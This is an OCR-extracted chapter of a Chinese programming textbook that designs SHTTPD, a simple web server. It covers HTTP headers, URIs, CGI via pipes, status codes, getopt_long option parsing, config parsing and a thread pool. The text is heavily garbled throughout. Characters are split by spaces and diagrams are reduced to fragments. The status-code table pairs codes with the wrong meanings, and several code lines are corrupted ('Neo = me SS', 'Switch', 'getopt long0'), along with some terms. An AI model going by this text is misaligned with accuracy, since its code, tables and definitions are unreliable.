HTTP 协议 的 头 部 有 很 多 内 容 ， 本 书 中 仅 介绍 几 个 常用 的 头 域 。 
口 主机 头 域 : 主机 头 域 用 于 指定 请 求 资源 的 网 络 主机 卫 地 址 和 端口 号 ， 客 户 端 在 发 
送 请 求 的 时 候 必须 在 URL 中 包含 原始 服务 器 或 网 关 的 位 置 。HTTP/1.1 请 求 必须 包 
含 主机 头 域 ， 如 果 没 有 包含 主机 头 域 Web 服务 器 会 返回 错误 码 400。 
口 参考 头 域 : 参考 头 域 允 许 客 户 端 指定 请 求 URL 的 源 资 源 地 址 ， 即 请 求 当 前 URL 
的 前 一 个 URL 地 址 ， 参 考 头 域 用 于 帮助 服务 器 生成 URL 的 回 退 链表 ， 可 用 来 登 
录 、 优 化 缓存 等 。 它 也 允许 废除 的 或 错误 的 连接 。 如 果 请 求 的 URL 没有 地 址 ， 则 
不 发 送 参考 头 域 。 如 果 发 送 的 参考 头 域 不 是 一 个 完整 的 URL 地 址 ， 此 时 的 URL 
是 一 个 相对 地 址 。 
口 时 间 头 域 ， 时间 头 域 用 于 表示 消息 发 送 的 时 间 。 
口 范围 头 域 ， 范围 头 域 用 于 请 求 一 个 实体 的 一 部 分 。 
口 用 户 代理 头 域 : 用户 代码 头 域 用 于 包含 发 送 请 求 的 用 户 信 息 。 
18.1.6 ”SHTTPD 定位 URI 的 需求 
URI 是 Universal Resource Identy 的 简写 ， 是 同一 资源 标识 符 的 意思 ， 它 是 一 种 格式 化 
的 字符 串 ， 通 过 名 称 、 地 址 或 者 其 他 特征 来 确定 网 络 资源 的 位 置 。URI 已 经 广为人知 ， 例 
如 WWW 地 址 、 通 用 文件 标识 符 、 统 一 资源 定位 器 (URL)、 统 一 资源 名 称 CURN ) 等 。 
1. URI 的 一 般 语法 
URI 的 表示 形式 可 以 为 HTTP 里 的 绝对 形式 或 者 与 已 知 URI 对 比 的 相对 形式 。 两 种 形 
式 的 区 别 在 于 : 绝对 URI 要 以 一 个 协议 的 摘要 名 字 作 为 开头 ， 其 后 是 一 个 冒号 。 例 如 
http://www.sina.com.cn 是 一 种 绝对 URI， 而 www.sina.com.cn 是 一 种 相对 URI。 
对 于 URI 的 请 求 ,HTTP 协议 不 对 长 度 做 限制 ,服务 器 必须 处 理 到 达 服 务 器 的 任何 URI 
资源 请 求 ， 并 能 够 处 理 无 限 长 的 URI。 当 然 实际 的 服务 器 中 总 有 URI 请 求 的 长 度 限制 。 


2. HTTP URL 


HTTP 协议 通过 HTTP 协议 给 出 网 络 资源 的 位 置 。 其 形式 如 下 : 
Neo = me SS 


即 一 个 “http:” 后 面 跟 “//”， 然 后 是 主机 的 名 字 ， 名 字 后 面 是 主机 的 端口 。 然 后 是 主 
机 的 请 求 资源 ， 如 果 之 后 有 “?” 则 后 面 会 有 传 给 服务 器 的 参数 。 
这 个 形式 中 ， 如 果 端 口 为 空 或 未 给 出 ， 系 统 会 使 用 默认 值 80。 


3. URI 比较 
URI 是 大 小 写 敏感 的 ， 也 就 是 说 ， 比 较 两 个 URI 是 否 一 致 ， 字 符 串 必须 按照 大 小 写 是 


se 
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两 个 不 同 资源 来 对 待 。 例 外 情况 如 下 : 
口 当 请 求 资源 的 端口 没有 给 出 或 者 为 空 的 时 候 ，URI 的 端口 为 默认 值 。 
口 对 于 URI 中 的 主机 名 的 比较 必须 是 不 区 分 大 小 写 的 ， 例 如 WWW.SINA.COM.CN 
和 www.sina.com.cn 是 相同 的 URI。 
口 协议 的 名 称 比 较 必须 是 不 区 分 大 小 写 的 ， 例 如 HTTP://www.sina.com.cn 和 
http://www.sina.com.cn 是 相同 URI。 
除了 “保留 ”或 “和 危险” 集 里 的 字符 ， 字 符 等 同 于 它们 的 “% HEX HEX” 编 码 。 以 下 
3 个 URI 是 等 同 的 。 
http://sina.com: 80/index.html 


http://sina.com/index.html 
http://SINA.com: /index.html 


18.1.7 SHTTPD 支持 CGI 的 需求 


CGI 脚本 是 任何 运行 在 Web 服务 器 上 的 程序 ，CGI 是 Common Gateway Interface 的 缩 
邓 , “通用 网 关 接口 ”的 意思 。 简 单 地 讲 ，CGI 脚本 是 一 个 可 以 运行 在 Web 服务 器 上 的 程 
序 ， 由 浏览 器 的 输入 触发 。 使 用 这 种 脚本 ， 可 以 执行 服务 器 端的 任何 操作 ， 但 CGI 脚本 通 
常用 于 构建 服务 器 程序 和 其 他 系统 程序 ， 例 如 数据 库 之 间 的 桥梁 。 

CGI 脚本 可 能 是 一 个 脚本 ， 或 者 一 个 二 进 制 可 执行 程序 ， 也 就 是 说 ， 它 可 能 是 一 个 编 
译 好 的 程序 、 批 命令 文件 或 者 其 他 可 执行 的 东西 。 它 的 一 个 共同 的 特性 是 可 以 执行 并 将 结 
果 反 馈 回来 。 

CGI 脚本 可 以 利用 如 下 的 两 种 方法 使 用 : 作为 一 个 表单 的 ACTION 的 响应 对 象 的 
URL。 例 如 ， 有 一 个 脚本 叫 Show_Data， 它 是 一 个 指向 CGI 脚本 的 链接 ， 其 HTML 表示 
如 下 : 


<A HREF="http://192.168.1.100:8080/cgi-bin/showdate">Show the Date</A> 


一 般 情况 下 ，CGI 脚本 都 放 在 目录 “/cgi-bin/” 下 ,在 许多 Web 服务 器 中 ， 目录 cgi-bin 
是 仅 能 够 放置 CGI 脚本 的 目录 。 

当 网 络 浏览 器 执行 这 个 链接 的 时 候 ， 浏 览 器 向 客户 端 主机 192.168.1.100 发 送 请 求 ， 服 
务 器 接收 到 客户 端的 请 求 ， 然 后 执行 CGI 脚本 ， 并 将 结果 反馈 回来 。 

假设 showdate 是 服务 器 上 的 一 个 CGI 脚本 程序 ， 其 代码 如 下 : 


#!/bin/sh 

echo Content-type: text/plain 

echo 

/bin/date 

第 一 行 是 个 特殊 的 命令 , 告诉 UNIX 系统 这 是 个 shell 脚本 ; 真实 的 情况 是 从 这 行 开 
始 的 下 一 行 ， 这 个 脚本 做 两 件 事 : 第 一 ， 它 输出 行 Content-type:text/plain， 接 着 开始 一 
个 空 行 ， 第 二 ， 它 调用 UNIX 系统 时 间 date 程序 ， 输 出 日 期 和 时 间 。 脚 本 执行 后 输出 
如 下 : 


Content-type: text/plain 
Tue Dev 25 16°15:57 EDT 2008 


i 


"SI 
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18.1.8 ”SHTTPD 错误 代码 的 需求 


错误 代码 ， 即 状态 码 是 试图 理解 和 满足 请 求 的 3 位 数字 的 整数 码 。 状 态 码 的 第 1 位 数 
字 定 义 应 答 类 型 ， 后 2 位 数字 没有 任何 类 型 任务 。 第 1 位 数字 有 以 下 5 种 值 。 

口 -lxx: 报告 的 ， 接 收 到 请 求 ， 继 续 进程 。 

口 -2xx: 成 功 ， 操 作成 功 的 收 到 。 

口 -3xx: 重 发 ， 为 了 完成 请 求 ， 必 须 采 取 进 一 步 措施 。 

口 -4xx: 客户 端 出 错 ， 请 求 包括 错 的 顺序 或 不 能 完成 。 

口 -5xx: 服务 器 出 错 ， 服 务 器 无 法 完成 显然 有 效 的 请 求 。 

HTTP/1.1 中 定义 的 状态 码 的 含义 如 表 18.1 所 示 。 经 常 使 用 状态 码 的 含义 如 下 : 


表 18.1 HTTP/1.1 协议 的 状态 码 


值 值 含义 


100 404 表示 没 找到 

101 405 表示 不 允许 的 方式 
200 406 表示 不 接受 

201 407 表示 需要 代理 验证 
202 408 表示 请 求 超时 


203 表示 非 权 威信 息 409 表示 冲突 
204 410 表示 停止 
205 表示 重 置 内 容 411 表示 需要 的 长 度 


206 412 表示 预 处 理 失败 
300 413 表示 请 求实 体 太 大 
301 414 表示 请 求 -URI 太 大 
302 415 表示 不 支持 的 媒体 类 型 
303 416 表示 请 求 的 范围 不 满足 


304 表示 只 读 417 表示 期 望 失败 

305 500 表示 服务 器 内 部 错误 
307 表示 临时 重 发 501 表示 不 能 实现 

400 表示 坏 请 求 502 表示 坏 网 关 

401 表示 未 授权 的 503 表示 服务 不 能 实现 

402 表示 必要 的 支付 504 表示 网 关 超 时 

403 表示 禁用 505 表示 HTTP 版 本 不 支持 


18.2 ”SHTTPD 的 模块 分 析 和 设计 
要 实现 SHTTPD 服务 器 ， 需 要 对 服务 器 的 架构 和 模块 进行 仔细 地 分 析 ， 例 如 客户 、 服 
务 器 模式 的 选 型 ，CGI 的 实现 方法 、 命 令 行 脚 本 的 解析 等 。 本 节 将 对 18.1 节 中 的 需求 进行 
仔细 的 分 析 ， 提 供 一 种 解决 的 方法 。 


1 > 


18.2.1 SHTTPD 的 主 函 数 


为 了 更 好 地 展示 Web 服务 器 的 架构 ,SHTTPD 的 主 函数 设计 为 十 分 简单 的 模型 。 主 函 
数 仅仅 调用 必要 的 功能 函数 ， 具 体 细节 由 各 功能 函数 实现 。 主 函数 完成 4 个 部 分 的 功能 : 
初始 化 服务 器 配置 参数 、 套 接 字 初始 化 的 一 些 操作 、 运 行 调度 函数 、 挂 接 信 号 处 理 函 数 
如 图 18.6 所 示 。 


开始 


挂 接 SIGINT 信号 
signal (SIGINT, 
Sig_int) ; 


一 
初始 化 参数 
Para_Init() 


服务 器 初始 化 操作 
do listen() 


开始 任务 调度 
Worker_Schedule Run() 


图 18.6 ”SHTTPD 的 模型 框架 


口 挂 接 信号 处 理 函数 ， 在 服务 器 的 其 他 部 分 运行 之 前 ， 为 了 保证 能 够 及 时 地 使 服务 
器 SHTTPD 释放 锁 申 请 的 资源 ， 需 要 挂 接 信号 处 理 函 数 ， 在 函数 中 对 程序 退出 之 
前 申请 的 资源 进行 释放 。 

口 初始 化 配置 参数 : 配置 参数 的 初始 化 顺序 是 首先 设置 系统 的 默认 配置 ， 然 后 读 取 
命令 行 配置 ， 命 令 行 配置 中 的 选项 覆盖 默认 配置 项 ; 最 后 读 取 配 置 文件 的 配置 情 
况 并 覆盖 之 前 二 者 的 配置 选项 。 

口 服务 器 开始 前 的 初始 化 : 进行 服务 器 的 其 他 初始 化 操作 ， 主 要 进行 accept 之 前 的 


服务 器 设置 。 
口 调度 函数 : 调用 多 客户 端 服务 框架 ， 处 理 客户 端 连接 ， 直 到 接收 到 命令 行 的 退出 
信号 。 


.520 。 


第 18 章 一 个 简单 Web 服务 器 的 例子 SHTTPD 


18.2.2 SHTTPD 命令 行 解析 的 分 析 设 计 


服务 器 SHTTPD 的 命令 行 解析 ,需要 进行 大 量 的 命令 行 字符 串 解析 ,程序 设计 起 来 比 
较 麻烦 。 


和 


去 
到 


思想 用 


getopt_long() 函 数 介绍 


好 ，GNU C 库 有 一 个 命令 行 解 析 函 数 。 使 用 此 函数 可 以 节省 大 量 的 时 间 ， 将 主要 的 
在 业务 处 理 上 。 使 用 gce 的 getopt_long() 函 数 可 以 自动 地 进行 命令 行 解析 程序 设计 。 


使 用 getopt_long() 函 数 需要 引入 头 文件 getopt.h。 其 函数 的 声明 如 下 : 
#include <getopt.h> 


int getopt long(int argc, char * const argv[], const char *optstring, 
const struct option *longopts, int *longindex); 


参数 说 明 如 下 所 述 。 


口 


口 
口 


口 


参数 argc: 表示 输入 参数 的 个 数 ， 与 参数 argv 通常 都 是 从 main() 函 数 的 输入 参数 
中 直接 传递 过 来 的 。 

参数 argv: 表示 输入 参数 的 字符 串 数 组 。 

参数 optstring: 是 选项 组 成 的 字符 串 ， 如 果 该 字符 串 里 任 一 字母 后 有 冒号 ， 那 么 这 
个 选项 就 要 求 有 参数 。 例 如 ， 某 个 命令 的 选项 字符 串 为 ch， 则 可 以 使 用 -c xxx 这 
种 带 参数 的 选项 ， 而 -h 选项 不 需要 参数 。 

参数 longopts: 是 长 参数 选项 ， 下 一 个 是 指向 数组 的 指针 ， 这 个 数组 是 option 结构 
数组 ，option 结构 称 为 长 选项 表 。 其 声明 如 下 : 


struct option 


结 


口 
口 


const char *name; 
int has arg; 
int *flag; 

int val; 


构 中 的 元 素 解释 如 下 所 述 。 
参数 name: 选项 名 ， 即 进行 参数 判定 时 的 匹配 字符 串 。 
参数 has_arg: 描述 长 选项 是 否 有 参数 ， 其 值 见 表 18.2。 


表 18.2 结构 option 的 成 员 flag 的 含义 


符号 常量 含义 
no_argument 选项 没有 参数 
required_argument 选项 需要 参数 
optional_ argument 选项 参数 是 可 选 的 


参数 flag， 如 果 该 指针 为 NULL， 那 么 getopt long0) 函 数 返 回 的 为 对 应 val 字段 的 
值 ; 如果 该 指针 不 为 NULL， 那么 会 使 得 它 所 指向 的 结构 填 入 val 字段 的 值 ， 同 时 
getopt long 返回 0。 

参数 val， 如 果 flag 是 NULL， 那 么 val 通常 是 个 字符 常量 ， 如 果 短 选项 和 长 选项 


AS 
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一 致 ， 那 么 该 字符 就 应 该 与 optstring 中 出 现 的 这 个 选项 参数 相同 。 
2. SHTTPD 中 的 命令 行 选项 定义 


如 图 18.7 所 示 为 SHTTPD 服务 器 命令 行 解析 的 含义 ， 其 长 参数 、 短 参数 匹配 字符 和 
含义 如 表 18.3 所 示 。 


更 新 配置 
| 
-| ore 
| er | 一 | 复制 字符 中 
| 网 站 根 目录 一 ~ ”复制 字符 申 


-~-DocumentRoot' ‘-o' 


C=getopt_long ”站 


服务 器 侦 听 端口 
‘~-ListenPort -I [一 ~ ”获取 整 型 值 


最 大 客户 端 数 量 


'--MaxClient' '-m 六 一 ”获取 整 型 值 
| 连接 超时 时 间 
'--TimeOut '-t 一 ”| ”获取 整 型 值 
帮助 
:Help' '-h 一 > 打印 信息 


图 18.7 命令 行 解析 的 含义 


表 18.3 SHTTPD 服务 器 命令 行 解析 的 含义 
长 参数 字符 串 短 参 数字 符 串 
--CGIRoot | -C 
--DefaultFile -d 


含义 
CGI 根 路 径 
目录 下 默认 文件 
配置 文件 名 称 
网 站 根 目录 


--ConfigFile 


--DocumentRoot 
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续 表 


长 参数 字符 串 短 参数 字符 串 含 义 

-ListenPort | -1 服务 器 侦 听 端口 
-MaxClient | -m 最 大 客户 端 数量 
--TimeOut | -t 连接 超时 时 间 

--Help -h 帮助 


设置 如 下 形式 的 参数 来 提供 命令 行 参数 选项 的 解析 ， 其 中 短 参 数 类 型 为 : 


MOsoe re hor Lim 

对 应 的 长 参数 类 型 为 : 

{"CGIRoot", required argument, NULL, 'c'}, 
{"ConfigFile", required argument, NULL, 'f'}, 
{"DefaultFile", required argument, NULL, 'd'}, 
{"DocumentRoot", required argument, NULL, 'o'}, 
{"ListenPort", required argument, NULL, '1°'}, 
{"MaxClient", required argument, NULL, ‘'m'}, 
{"TimeOut", required argument, NULL, 't'}, 


18.2.3 ”SHTTPD 配置 文件 解析 的 分 析 设 计 


服务 器 SHTTPD 的 配置 文件 格式 与 一 般 的 配置 文件 格式 基本 一 致 ， 即 可 以 以 “#” 开 
头 的 注释 行 ， 或 者 按照 “关键 字 = 值 ”的 格式 书写 。 格 式 如 下 : 
[# 注 释 | [空格 ] 关键 字 [空格 ] = [空格 ] value] 


对 配置 文件 解析 的 程序 设计 流程 如 图 18.8 所 示 ， 先 打开 文件 , 然后 进行 配置 文件 中 数 
据 的 处 理 ， 解 析 处 理 完毕 后 关闭 文件 。 处 理 数据 的 时 候 ， 每 次 读 取 文件 中 的 一 行 数据 ， 直 
到 文件 中 的 数据 全 部 读 取 完毕 。 

对 配置 文件 数据 的 分 析 按 照 如 下 过 程 进行 : 

(1) 去 除 一 行头 部 的 空格 ; 

(2) 判断 是 否 为 注释 行 ， 如 果 为 注释 行 ， 略 过 此 行 ， 否 则 继续 进行 处 理 ; 

(3) 获得 配置 文件 的 配置 关键 字 ， 在 此 处 理 过 程 中 要 去 除 每 个 关键 字 尾部 的 空格 ; 

(4) 获取 = 号 ， 此 时 要 去 除 之 前 和 之 后 的 空格 ; 

(5) 最 后 获取 配置 文件 关键 字 的 值 。 

配置 文件 为 服务 器 的 主 配置 选项 ， 配 置 文件 中 包含 的 配置 选项 优先 级 高 于 命令 行 配 置 
的 优先 级 。 配 置 文件 的 配置 将 覆盖 命令 行 的 配置 。 


18.2.4 SHTTPD 的 多 客户 端 支持 的 分 析 设 计 


服务 器 SHTTPD 的 多 客户 端 支持 模块 为 此 程序 的 主 处 理 模块 。 在 此 模块 中 进行 客户 端 
连接 的 处 理 、 请 求 数据 的 接收 、 响 应 数据 的 发 送 和 服务 线程 的 调度 。 模 块 的 核心 部 分 采用 
线程 池 的 服务 器 模型 ， 如 图 18.9 所 示 。 

模块 初始 化 的 时 候 ， 建 立 线程 池 ， 其 中 的 线程 负责 接收 客户 端的 请 求 、 解 析 数 据 并 响 
应 数据 。 当 客户 端 请 求 到 来 的 时 候 ， 主 线程 查看 当前 线程 池 中 是 否 有 空闲 的 工作 线程 ， 当 
没有 工作 线程 的 时 候 会 建立 新 的 工作 线程 ， 然 后 分 配 任务 给 空闲 的 线程 。 


打开 文件 
1 读 取 一 行 
去 除 头 部 空格 

1 文件 末尾 

获得 配置 关键 字 

是 
获得 = 
一 
获得 配置 值 


关闭 文件 


图 18.8 服务 器 SHTTPD 的 配置 文件 解析 


线程 池 
请 求 业务 处 理 线程 


连接 业务 处 理 线程 


”| select() 
send| 
accept() 
1 
接收 请 求 数据 
了 
| 
处 理 数据 
增加 工作 线程 
了 
了 
发 送 请 求 数据 
分 配 任务 


图 18.9 多 客户 端 模块 的 数据 处 理 模 型 
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工作 线程 轮 询 接收 客户 端的 请 求 数据 ， 进 行 请 求 数据 分 析 并 响应 请 求 ， 处 理 完毕 后 ， 
关闭 客户 端的 连接 ， 等 待 主线 程 分 发 下 一 个 请 求 。 

多 客户 端 模块 的 线程 处 理 框架 如 图 18.10 所 示 ， 主 要 分 为 两 个 部 分 : 线程 调度 部 分 和 
线程 退出 部 分 。 线 程 调度 部 分 负责 线程 初始 化 、 线 程 的 增 减 、 线 程 的 销毁 及 线程 互 斥 区 的 
保护 。 线 程 退出 部 分 则 发 送信 号 给 工作 线程 ， 使 得 工作 线程 能 够 及 时 地 释放 资源 。 这 主要 
应 用 于 接收 到 用 户 的 信号 SIGINT 时 调用 。 


| 调度 线程 工作 | 
Worker_ScheduleRun() 


Worker_ScheduleStop 


线程 退出 
图 18.10 多 客户 端的 线程 框架 


工作 者 线程 分 为 多 个 状态 : 线程 初始 化 状态 、 线 程 空间 状态 、 线 程 运行 状态 、 线 程 退 
出 中 状态 和 线程 退出 完毕 状态 ， 如 图 18.11 所 示 。 


线程 初始 化 


线程 空闲 - 线程 退出 中 -一 线程 退出 完毕 


加 本 


线程 处 理 数 据 


图 18.11 工作 线程 的 状态 图 


口 线程 建立 的 时 候 状 态 为 线程 初始 化 状态 ， 此 时 工作 线程 不 可 以 接受 主线 程 的 任务 ， 
刚刚 进入 线程 函数 。 

口 线程 建立 完毕 的 时 候 进 入 线程 空闲 状态 ， 此 时 可 以 接受 主线 程 分 配 的 任务 ， 处 理 
客户 端的 请 求 ， 并 进行 响应 。 

口 线程 运行 状态 为 线程 正在 处 理 客户 端 请 求 的 时 机 ， 可 以 由 空闲 状态 转 入 ， 转 入 的 
条 件 为 主线 程 分 配给 此 线程 一 个 任务 。 在 处 理 完 客户 端 请 求 时 ， 线 程 可 以 转 入 空 
闲 状态 ， 等 待 下 一 次 客户 端 请 求 任务 的 分 配 。 

口 线程 退出 中 的 状态 主要 由 接收 到 SIGINT 信号 后 调用 线程 退出 函数 时 引起 , 此 时 各 
个 线程 在 非 阻塞 的 时 候 会 及 时 响应 此 状态 ， 释 放 资 源 、 关 闭 连接 。 进 入 线程 退出 
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完毕 的 状态 。 
口 线程 退出 完毕 状态 是 由 于 各 个 线程 都 释放 完 申请 的 动态 资源 ， 正 常 结束 后 进入 的 
状态 。 此 时 ， 整 个 应 用 程序 可 以 正常 退出 了 。 


18.2.5 ”SHTTPD 头 部 解析 的 分 析 设 计 
HTTP 请 求 的 格式 如 下 : 


[METHOD URI HTTP/[1|0].[910|1]\r\n] 


主要 包含 方法 、URI、HTTP 的 版 本 ， 目 前 SHTTPD 服务 器 所 支持 的 方法 仅 为 GET， 
因为 GET 方法 可 以 满足 大 部 分 的 Web 应 用 。HTTP 的 版 本 , 可 以 取 值 为 0.9、1.0 或 者 1.1。 
可 以 用 如 下 方法 获得 HTTP 版 本 的 主 版 本 号 和 次 版 本 号 。 
sscanf (P， 
"HTTP/%1lu.%lu", 
& major, 
&minor); 
其 中 , p 为 HTTP 版 本 的 头 部 指针 ,例如 指向 “HTTP/1.1” 字 符 串 的 头 部 ，major 内 为 
主 版 本 号 ，minor 内 为 副 版 本 号 。 
方法 METHOD 可 以 通过 字符 串 比 较 的 方法 获得 ， 例 如 比较 字符 串 头 部 的 三 个 字符 可 
以 判定 是 否 为 GET 方法 ， 比 较 POST 可 以 判定 是 否 为 POST 方法 。 
URI 的 获得 可 以 通过 比较 METHOD 结束 后 两 个 空格 之 间 的 字符 串 获 得 。 


18.2.6 SHTTPD 对 URI 的 分 析 设 计 


URI 是 客户 端 请 求 主机 网 络 资源 的 位 置 , 对 于 URI 的 分 析 主要 有 以 下 几 个 方面 需要 特 
别 注意 。 

资源 位 置 的 确定 。 请 求 主 机 的 位 置 以 “/” 开 始 ， 其 后 为 相对 路 径 ， 要 注意 请 求 的 路 径 
中 使 用 “../././” 的 形式 取得 请 求 范围 的 扩大 。 资 源 位 置 的 最 后 一 个 “/” 之 后 的 字符 串 为 
实际 请 求 的 文件 名 ， 需 要 根据 此 文件 名 判定 请 求 资源 的 类 型 ， 例 如 请 求 一 个 常规 文件 、 请 
求 一 个 目录 来 获得 目录 下 面 所 有 文件 的 列表 、 请 求 CGI 等 。 

URI 资源 中 的 “保留 ”和 “和 危险 ”字符 集 。 此 字符 集中 的 字符 等 同 于 它们 的 “% HEX 
HEX” 编 码 ， 即 对 于 一 个 以 “% ”开头 的 字符 ， 需 要 进行 转换 后 使 用 其 真正 的 值 。 可 以 使 
用 如 下 代码 来 进行 转换 ， 

#define HEXTOI (x) (isdigit(x) ? x - '0' : x - 'W') 

Switch (src[i]) 

a Ee 

if (isxdigit(((unsigned char *) src)[i + 1]) && 
isxdigit(((unsigned char *) src)[i + 2])) 


{ 
a = tolower(((unsigned char *)src) [i + 1]); 
b = tolower(((unsigned char *)src) [i + 2]); 
dst[j] = (HEXTOI(a) << 4) | HEXTOI (b); 
寺 += 2; 

} 
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如 果 为 “%” 开 头 的 字符 ， 则 将 其 后 面 的 两 个 字符 拼接 后 转换 成 一 个 字符 。 
18.2.7 SHTTPD 支持 方法 的 分 析 设计 


服务 器 SHTTPD 的 方法 仅 支持 GET， 使 用 GET 方法 可 以 满足 大 多 数 的 静态 网 页 的 应 
j 。 在 对 客户 端的 请 求 进 行 解 析 获 得 请 求 的 方法 为 GET 后 , 服务 器 端的 方法 实现 主要 分 为 
如 下 两 个 部 分 : 
口 头 部 信息 的 组 织 。 
口 文件 内 容 的 发 送 。 
对 客户 端 请 求 响应 的 头 部 信息 主要 包含 HTTP 版 本 、 状 态 值 、 状 态 信息 、 当 前 日 期 、 
请 求 资源 的 最 后 修改 日 期 、ETAG、 请 求 资源 的 内 容 类 型 、 请 求 资源 的 内 容 长 度 、 所 发 送 
内 容 的 范围 等 。 例 如 下 面 的 字符 串 : 
"HTTP/1.1 200 OK\r\n" 
"Date: 2013-6-10 15:06\r\n" 
"Last-Modified: 2013-6-10 15:06\r\n" 
mokag NneoN NieNn 
"Content-Type:text/html\r\n" 
"Content-Length: 218\r\n" 
"Accept-Ranges: bytes\r\n" 
"100-200/218\r\n" 
表示 所 请 求 内 容 的 最 后 修改 日 期 为 “2013-6-10 下 午 15: 06”， 当前 日 期 为 “2013-6-10 
下 午 15: 06” 其 类 型 为 “text/htm1” 即 文本 或 者 HTML 文档 ， 请 求 内 容 的 总 长 度 为 218 
字 节 ， 目 前 发 送 给 客户 端的 内 容 范围 为 100 一 200 字 节 。 
客户 端 所 请 求 的 内 容 跟 在 头 部 的 后 面 , 长 度 为 范围 所 指定 的 长 度 , 如 上 例 中 长 度 为 100 
的 字 节 。 


18.2.8 ”SHTTPD 支持 CGI 的 分 析 设计 


Web 服务 器 中 的 CGI 是 一 段 外 部 程序 ， 它 可 以 动态 地 生成 代码 ， 并 可 以 接收 输入 的 参 
数 。 支 持 CGI 主要 分 为 如 下 几 个 部 分 : 

口 CGI 运行 程序 和 输入 参数 的 分 析 ; 

口 一 个 进程 运行 CGI 程序 ， 将 CGI 程序 的 输出 发 给 与 客户 端 通信 的 进程 ; 

口 与 客户 端 通信 的 进程 生成 头 部 信息 ， 并 将 CGI 运行 进程 的 输出 发 给 客户 端 。 

CGI 程序 及 参数 的 分 析 用 于 得 到 CGI 程序 和 CGI 程序 运行 时 的 输入 参数 。 例 如 对 于 一 
个 请 求 http://localhost/add?atb， 在 服务 器 端 运行 的 CGI 程序 为 add， 参 数 为 a 和 b， 用 于 
计算 a、b 之 和 。 

一 个 完整 的 CGI 程序 执行 过 程 如 图 18.12 所 示 。 在 分 析 CGI 程序 和 参数 之 后 ， 需 要 建 
立 进程 间 通 信 管 道 ， 便 于 执行 CGI 程序 时 接收 CGI 程序 结果 。 然 后 进程 分 又 ， 主 进程 负责 
与 客户 端 进行 通信 ， 先 分 析 得 到 头 部 信息 ,然后 与 CGI 执行 程序 进程 通信 ， 读 取 CGI 执行 
的 结果 ， 最 后 关闭 进程 后 退出 。 

执行 CGI 程序 是 一 个 相对 来 说 比较 复杂 的 设计 , 采用 进程 间 的 管道 通信 方式 ,来 获得 
CGI 程序 的 输出 并 发 送 到 客户 端 。CGI 执行 程序 的 输出 为 标准 输出 ， 为 了 在 主 进程 中 能 
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建立 进程 间 
通信 管道 


调用 CGI 程 序 


图 18.12 CGI 程序 的 执行 过 程 
获得 CGI 执行 进程 的 CGI 输出 , 这 里 采用 了 进程 间 的 管道 通信 方式 并 使 用 了 文件 描述 符 的 
复制 操作 ,将 CGI 执行 进程 中 管道 的 一 端 与 标准 输出 绑 定 起 来 ，CGI 程序 的 输出 数据 会 进 
行 管道 ， 主 程序 可 以 在 另 一 端 接收 到 CGI 执行 结果 在 标准 输出 的 结果 。 
如 图 18.13 所 示 ， 构 建 CGI 执行 程序 的 过 程 主要 分 为 如 下 步 又: 


(1) 建立 管道 。 
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(2) 进程 分 又 ， 分 为 主 进程 和 CGI 进程 ， 主 进程 负责 


(s.1) 关闭 输入 管道 的 写 端 ， 留 下 读 端 ， 这 个 


输出 绑 定 在 一 起 。 
(s.2) 从 管道 中 读 取 数据 。 
(s.3) 将 数据 发 送 到 客户 端 。 
(s.4) 如 果 数 据 结束 等 待 CGI 进程 结束 。 
在 CGI 进程 中 : 
(c.1) 关闭 管道 的 读 端 ， 留 下 写 端 , 这 个 管道 
执行 结果 发 送 给 主 进程 。 


行 CGI 程序 。 
建立 in/out 管 道 
进程 分 又 
四 I 
关闭 in 管 道 的 写 端 关闭 in 管 道 的 读 端 
PE 一 
将 in 管道 的 写 端 
关闭 out 管 道 读 端 绑 定 到 标准 输出 
> ~ 
=| 从 管道 in 读 数据 关闭 out 管 道 写 端 
一 
成 功 执行 CGI 程序 
1 
将 数据 发 送 到 
客户 端 
1 
等 待 子 进程 退出 
图 18.13 CGI 进程 构建 过 程 
在 主 进程 中 : 


与 客户 端 通信 ，CGI 进程 负责 


管道 另 一 端 在 CGI 进程 中 与 CGI 的 标准 


与 主 进程 中 管道 的 读 ; 


(c.2) 将 此 管道 的 写 端 与 进程 的 标准 输出 绑 定 在 一 起 。 


日 于 将 CGI 


“as 


(C6: 


3) 关闭 写 管道 。 


(3) 执行 程序 。 
具体 的 管道 构建 过 程 如 图 18.14 所 示 。 


写 端 
主 进程 
读 端 
CGI 进 程 
标准 输出 
CGI 进 程 
读 端 写 端 
CGI 进 程 


读 端 写 端 


图 18.14 ”使 用 管道 构建 标准 输出 的 进程 间 通 信 


18.2.9 ”SHTTPD 错误 处 理 的 分 析 设 计 


当 


用 户 的 请 求 发 生 错误 ， 或 者 服务 器 端 发 生 错 误 ， 以 及 网 络 传输 过 程 中 发 生 错误 时 ， 


需要 给 客户 端 发 送 合适 的 错误 信息 ， 应 该 包含 错误 代码 和 错误 含义 。 发 送 给 出 错 客户 端的 
信息 格式 为 : 

"HTTP/ 主 版 本 . 副 版 本 错误 代码 错误 信息 \r\n" 

"Content-Type: 内 容 类 型 \r\n" 

"Content-Length: 内 容 长 度 \r\n" 


"\r\n" 


"错误 信息 "， 
例如 ， 对 于 400 类 型 的 错误 ， 发 送 给 客户 端的 信息 为 : 


= 
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"HTTP/1.1 400 Error: 400\r\n" 
"Content-Type:text/html\r\n" 
"Content-Length:6\r\n" 


mwNrNnn 
服务 器 SHTTPD 支持 的 错误 处 理 如 图 18.15 所 示 ， 根 据 侦 测 得 到 的 错误 类 型 ， 将 不 同 
的 错误 类 型 信息 打 成 内 容 不 同 的 包 ， 发 送 给 客户 端 。 其 内 容 主要 包含 错误 类 型 、 错 误 信息 ， 
以 及 发 送 给 客户 端的 内 容 信息 。 
永久 移动 ”| 一 一 ”| 301 
创建 ——”| 302 
观察 别 的 部 分 | 一 一 =| 303 
只 读 上 一 ~| 304 
用 户 代理 “上 305 
| 临时 重 发 307 
| 环 请 来 400 
未 授权 的 401 
| ”必要 的 支付 “| 一 一 | 402 
禁用 | -| 403 
没 找到 一 一 ~| 404 
不 允许 的 方式 405 
不 接受 aa 406 
需要 代理 验证 | 一 一 =| 407 N 背 误 信 
错误 类 型 请 求 十 可 | -~[ 408 息 打 包 
冲突 409 (MM 客户 端 
停止 [ 410 | 
需要 的 长 度 ”| 一 一 =| 411 
预 处 理 失败 上 一 412 
请 求实 体 太 大 “上 一 一 ~| 413 
请 求 URI 大 大 二 一 -| 414 
不 支持 的 媒体 类 型 | 一 一 =| 415 
请 求 的 范围 不 满足 | 一 一 一 =| 416 
期 望 失 败 ”| 一 一 =| 417 
服务 器 内 部 错误 | 一 一 =| 500 
不 能 实现 | 一 >| 501 
坏 网 关 | 一 一 "| 502 
服务 不 能 实现 | 一 | 503 
